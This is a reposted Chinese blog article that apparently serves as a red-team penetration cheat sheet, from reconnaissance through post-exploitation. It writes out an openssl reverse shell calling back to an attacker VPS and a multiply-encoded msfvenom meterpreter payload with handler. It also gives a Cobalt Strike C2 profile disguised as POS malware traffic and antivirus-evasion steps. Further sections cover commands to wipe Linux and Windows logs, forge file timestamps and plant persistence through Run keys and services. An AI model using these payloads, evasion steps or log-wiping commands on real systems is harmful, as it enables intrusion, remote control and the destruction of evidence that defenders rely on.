红蓝攻防之渗透技巧总结 建议收藏

gclome

原文链接：红蓝攻防之渗透技巧总结  建议收藏

​
前言
首先我们拿到一个站不能心急，凡事三思而行 跑得太快是会滑倒的。网络安全方面可以看看我的另一篇防范技巧。
当我们获得目标的时候不要急着用扫描器，这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录，什么站能扫什么站不能扫，心里一定要有点b数，不然可能等待的就是不一样的结果了。如果手工测试无果后再用代理手法扫描网站，必要的时候设置二级代理。当然！！！！什么站能扫什么站不能扫，心里一定要有点b数！小提示：在使用proxychains的时候，程序或者终端选项尽量不要设置任何协议的代理,否则可能会打乱这个代理回路出现网络错误。

​

浅蓝的渗透测试导图以及小工具
这里有一个更加详细的导图，可以做一个大致的方向参考，跟着方向逐一测试,期间也可以巩固基础。地址在这

​

关注公众号:hack之道，后台回复关键词：666，获取最新渗透教程和工具。
这里再附一个渗透工具包，帮助新手熟悉渗透测试:gorailgun渗透工具
AWVS + Nessus docker

1. # 拉取镜像
   
2.   docker pull leishianquan/awvs-nessus:v1
   
3.   # 启动
   
4.   docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
   
5.   # 查看容器
   
6.   docker ps –a
   
7.   # 启动容器
   
8.   docker start container-id
   
9.   # 进入容器
   
10.   docker exec –it container-id /bin/bash
    
11. 
    
12.   # 进入容器后，启动nessus
    
13.   /etc/init.d/nessusd start
    
14. 
    
15.   # 访问扫描器地址和账号密码
    
16.   Nessus:
    
17.   https://127.0.0.1:8834/#/
    
18.   account:leishi/leishianquan
    
19. 
    
20.   Awvs13:
    
21.   https://127.0.0.1:13443/
    
22.   account:admin@admin.com/Admin123

复制代码

ZERO
首先进行信息收集你获得的信息越多对自己后面的渗透就越有帮助，whois，旁站子域，服务器操作系统版本，web中间件以及waf与cdn，通过google与github看看是否存在已知的漏洞这样有助于快速的获得权限，端口扫描并判断服务漏洞加以利用，目录的fuzz，弱口令的fuzz，google hack 进一步探测网站的信息后台以及敏感信息，撒旦天眼也是不错的信息工具。这里也推荐一个公众号：酒仙桥六号补丁

一.时刻关注返回的数据包
漏洞有很多种类型都需要渗透方认证仔细的对每个数据包已经url进行验证，要相信所有的努力都是为成功而付出的。如XSS,XSRF,sql注入，代码执行，命令执行，越权访问，目录读取，任意文件读取，下载，文件包含，远程命令执行，弱口令，上传，编辑器漏洞，暴力破解等
验证码与邮箱以及token的返回泄露，以及后台为校验从而可删除的参数。截获的敏感数据参数，学会在多个数据包反复尝试。从某个成功请求中捕获数据包观察cookie或者token是否存在规律或加密。通过修改返回的状态值，触发js进行逻辑漏洞的渗透。token的key参数解密构建获取真实user密钥，可拼接、规律、时间戳……

二.FUZZ的艺术
https://www.freebuf.com/vuls/221129.html

三.WEBBYPASS
linux反弹 shell：

1. 1）VPS 上生成 ssl 证书的公钥/私钥对：
   
2. openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
   
3. 2）VPS 监听反弹 shell：
   
4. openssl s_server -quiet -key key.pem -cert cert.pem -port 80
   
5. 3）目标上回连 shell：
   
6. mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <your_vps>:1024 > /tmp/s; rm /tmp/s
   
7. 
   
8. VPS 上已获取加密的 getshell 了。

复制代码

winodws桌面：TeamViewerQS单文件
windows下载文件；
certutil -urlcache -split -f https://raw.githubusercontent.co ... VE-2017-11882-v1.py test.py
脚本反弹内网：reGeorg
1.将 tunnel脚本（aspx | ashx | jsp | php）上传到Web服务器，访问显示“Georg says, ‘All seems fine’“，表示脚本运行正常。
2.在攻击者机器上，启动reGeorgSocksProxy.py，监听9999端口，看到 Checking if Georg is ready，确认正常运行,这个时候就可以吧目标机作为跳板了。
waf：中国蚁剑客户端，冰蝎与内存马，反复尝试使用编码字节绕过

四.提权与权限维持


首先通过检查目标服务器的进程与可利用服务以及漏洞
ssl加密payload

1. ###生成证书并写入文件
   
2. openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt
   
3. 
   
4. cat  rsaprivate.key servercertificate.crt >my.pem
   
5. ###生成payload
   
6. msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw
   
7. 
   
8. ###监听
   
9. msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
   
10. 
    

复制代码

老牌工具Cobaltstrike+Profiles
上云和隐藏流量参考free教程
1.利用keytool生成自己的免费证书（可在kali上生成）

1. keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store

复制代码

2.C2.profile文件编辑
​​

1. set sample_name "tryblog POS Malware";
   
2. 
   
3. set sleeptime "5000"; # use a ~30s delay between callbacks
   
4. set jitter    "10";    # throw in a 10% jitter
   
5. 
   
6. set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
   
7. 
   
8. #设置证书，注意以下内容得和你之前生成的证书一样
   
9. https-certificate {
   
10.     set CN       "TRY";
    
11.     set O        "TRY";   
    
12.     set C        "TRY";
    
13.     set L        "TRY";
    
14.     set OU       "TRY";  
    
15.     set ST       "TRY";
    
16.     set validity "365";
    
17. }
    
18. #设置，修改成你的证书名称和证书密码
    
19. code-signer{
    
20.     set keystore "tryblog.store";
    
21.     set password "tryblog";
    
22.     set alias "tryblog";
    
23. }
    
24. 
    
25. #指定DNS beacon不用的时候指定到IP地址
    
26. set dns_idle "8.8.4.4";
    
27. 
    
28. #每个单独DNS请求前强制睡眠时间
    
29. set dns_sleep "0";
    
30. 
    
31. #通过DNS上载数据时主机名的最大长度[0-255]
    
32. set maxdns    "235";
    
33. 
    
34. http-post {
    
35.     set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    
36. 
    
37.     client {
    
38.         header "Accept" "text/plain";
    
39.         header "Accept-Language" "en-us";
    
40.         header "Accept-Encoding" "text/plain";
    
41.         header "Content-Type" "application/x-www-form-urltrytryd";
    
42. 
    
43.         id {
    
44.             netbios;
    
45.             parameter "id";
    
46.         }
    
47. 
    
48.         output {
    
49.             base64;
    
50.             prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
    
51.             print;
    
52.         }
    
53.     }
    
54. 
    
55.     server {
    
56.         output {
    
57.             print;
    
58.         }
    
59.     }
    
60. }
    
61. 
    
62. http-get {
    
63.     set uri "/updates";
    
64. 
    
65.     client {
    
66.         metadata {
    
67.             netbiosu;
    
68.             prepend "user=";
    
69.             header "Cookie";
    
70.         }
    
71.     }
    
72. 
    
73.     server {
    
74.         header "Content-Type" "text/plain";
    
75. 
    
76.         output {
    
77.             base64;
    
78.             print;
    
79.         }
    
80.     }
    
81. }

复制代码

3.验证c2lint，启动服务端，载入汉化运行

1. ./c2lint C2.profile
   
2. ./teamserver ip:prot ./C2.profile
   
3. java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC  -jar cobaltstrike.jar

复制代码

免杀远控整理（来自Tide团队)

​

项目地址:https://github.com/QChiLan/BypassAntiVirus
windows下的免杀生成（顺序从上到下依次混淆）
如果需要捆绑正常软件运行使用shellter，如不能过免杀，再分步测试以下操作。cs文件编码混淆用AVIATOR生成。测试可以再用python再当前目录打开一个web服务器:
python3 -m http.server 8080
1.Lime-Crypter 注入线程
2.DeepSeaOBFuscator 封装
3.CryptoObfuscator 混淆
4.https 证书修改
5.base64prionx 混淆
6.themida 加壳
7.https 证书修改
8.viper(在线msf处理平台可加特征和签名很方便)
*通用免杀法（简单概括就是1.修改特征码2.花指令免杀3.加壳免杀。）

​

也可以通过把软件分块用杀软重复扫描找到特征码进行修改,当然也可以通过加载器的形式更加靠谱但是需要落地多个文件，c#文件自己封装推荐avator+掩盖日可以过火绒
Veil
Veil是一种免杀生成工具，用于生成绕过常见防病毒解决方案的metasploit有效负载。
一些payload加料的技巧
1、通过ssl与加壳加密palyoad（免杀）
2、通过dns或套cdn传输
windows
Exploit批量扫描：Windows-Exploit-Suggester
漏洞模块：https://github.com/SecWiki/windows-kernel-exploits
BITS免杀提权：https://github.com/ohpe/juicy-potato
linux
搜寻配置文件中的明文密码、sudo滥用
Exploit批量扫描：linux-exploit-suggester、linux-exploit-suggester-2
漏洞模块：https://github.com/SecWiki/linux-kernel-exploits

五、日志清理（细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心）


windows
遇见不能删除的先停止相关服务：net stop “task scheduler”
系统日志推荐使用工具：clearlog.exe
msf清理：clearev ，run event_manager -c

1. 防火墙日志路径：%systemroot%\system32\logfiles\
   
2. IIS日志路径：%systemroot%\system32\logfles\
   
3. windows系统日志：%systemroot%\system32\config\
   
4. Scheduler服务日志：%systemroot%\schedlgu.txt
   
5. 日志在注册表的键：HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
   
6. 系统日志：%SystemRoot%\System32\Winevt\Logs\System.evtx
   
7. 安全日志：%SystemRoot%\System32\Winevt\Logs\Security.evtx
   
8. 应用程序日志：%SystemRoot%\System32\Winevt\Logs\Application.evtx
   

复制代码

linux（检索根目录以及上级目录是否存在备份）
1.清空当前用户历史命令并删除相关文件：
history -c
echo “”> /root/.bash_history
echo “”> /var/run/utmp
2.清除部分日志：echo “”> /var/log/secure；全删除如不能删除使用echo依次覆盖：rm -f -r /var/log/*；

1. 
   
2. 
   
3. /var/log/boot.log：录了系统在引导过程中发生的事件，就是Linux系统开机自检过程显示的信息
   
4. 
   
5. /var/log/lastlog ：记录最后一次用户成功登陆的时间、登陆IP等信息
   
6. 
   
7. /var/log/messages ：记录Linux操作系统常见的系统和服务错误信息
   
8. 
   
9. /var/log/secure ：Linux系统安全日志，记录用户和工作组变坏情况、用户登陆认证情况
   
10. 
    
11. /var/log/btmp ：记录Linux登陆失败的用户、时间以及远程IP地址
    
12. 
    
13. /var/log/syslog：只记录警告信息，常常是系统出问题的信息，使用lastlog查看
    
14. 
    
15. /var/log/wtmp：该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件，使用last命令查看
    
16. 
    
17. /var/log/maillog 与邮件相关的日志信息
    
18. 
    
19. /var/log/cron 与定时任务相关的日志信息
    
20. 
    
21. /var/log/spooler 与UUCP和news设备相关的日志信息
    
22. 
    
23. /var/log/auth.log 系统授权信息，包括用户登录和使用的权限机制等 (debian)
    
24. 
    
25. /var/run/utmp：该日志文件记录有关当前登录的每个用户的信息。如 who、w、users、finger等就需要访问这个文件
    
26. 
    

复制代码

3.更新test.txt的时间和test2.txt时间戳相同：touch -r test.txt test2.txt;设定时间戳：touch -t 201605171210.20 test.txt
web容器路径
数据库通过查询配置文件定位日志（如mysql的配置文件文件my.inf，tomcat的配置文件tomcat-user.xml）
winodws

123	apche：C:\Program Files\Apache Software Foundation\Apache2.2\htdocs"tomact:C\Program Files\tomcat\lognignx: C\Program Files\nginx-1.14.2\logs\

linux

123	tomcat：/usr/local/tomcat/logs/apche：/usr/local/apache/logs/access_lognignx:/var/log/httpd/error_log  rm -f -r /var/log/*

七。后渗透与流量隐匿
frsocks+protoplex+流量重定向实现端口复用
protoplex是一个协议复用的工具，比如以下命令可将本地9999端口的流量根据协议类型转到本地的2333和80端口。用于绕过云主机的nsg安全规则。
./frsocks -sockstype fsocks -listen 2333  //创建本地监听./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流，根据协议类型转到本地的2333和80端口
重定向命令
linux：
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129

12	netsh interface portproxy show all //查看转发规则netsh interface portproxy reset   //清除所有转发规则

将 IP 流量封装进 IMCP 的 ping 数据包进行传输
工具如下
1、icmptunnel：https://github.com/jamesbarlow/icmptunnel
2、ptunnel：http://www.cs.uit.no/~daniels/PingTunnel/
3、icmpsh：https://github.com/inquisb/icmpsh
4、Powershell-ICMP：https://github.com/api0cradle/Powershell-ICMP
5、复杂的网络环境可以使用EarchWorm(ew)实现多级代理访问目标主机
后渗透
ps：合理利用后渗透插件可以剩下很多时间，但是要注意痕迹清理。插件有谢公子和梼杌完整版比较常用,Cobaltstrike推荐插件：谢公子、梼杌、Z1-AggressorScripts、ladong

​

​

详情参考这个：https://blog.csdn.net/qq_33020901/article/details/98357659
添加开机自启
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "test" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f

123456

sc create "server power" binpath= "C:\Windows\System32\config.exe"//设置服务的描述字符串sc description "server power" "description" //设置这个服务为自动启动sc config "server power" start= auto net start "server power" 启动服务

八、 一个便捷的HACK浏览器（上火狐开发者版本也不错）
这里个人做一个备份有需求的自行google，解释一下英文的插件功能。

​

​

​

Ajax Interceptor：可以自定义ajax的json返回值，前端测试用。
Anti-HoneyPot：红队用，可以检查网页中的蜜罐链接并提示。
ApiRequest.io Ajax Capture Debugging Tool：这个是神器！！强推，可以测试网页中任何的ajax请求包括跨站ajax请求重放，官网提供了只30天的请求历史记录记得保存重要请求。
Decentraleyes：可以拦截一些cdn和本地的文件跟踪器
APK Downloader for Google Play Store ：免google框架在线下载应用商店的app。
Buster Captcha Solver for Humans：过goole验证码，有时候识别会比较慢。
Easy WebRTC Block：干掉webrtc的ip回显，避免泄露真实ip
IP Whois & Flags Chrome & Websites Rating：自动在后台测试当前网站ip的归属地然后以小图标的形式返回给前台非常便捷，点击进去还可以看到cdn以及whois信息。
NoScript: 慎用，此插件可以强力的拦截网页上的追踪器来保护用户的隐私与真实信息，但是会造成许多网站打开异常。
Identify web technologies ：可以帮你分析当前网站所使用的网络技术与框架。
Shodan：网络搜索引擎同fofa与钟馗之眼，互联网设备大杀器
Picture-in-Picture Extension：画中画悬浮窗口看视频
SourceDetector：可以再后台默默的扫描是否有源代码泄露
HackTools：方便懒人使用点击扩展可快速复制sql，xss，反弹shell。
文章转载于xlmy.net，如侵权请联系删除。
​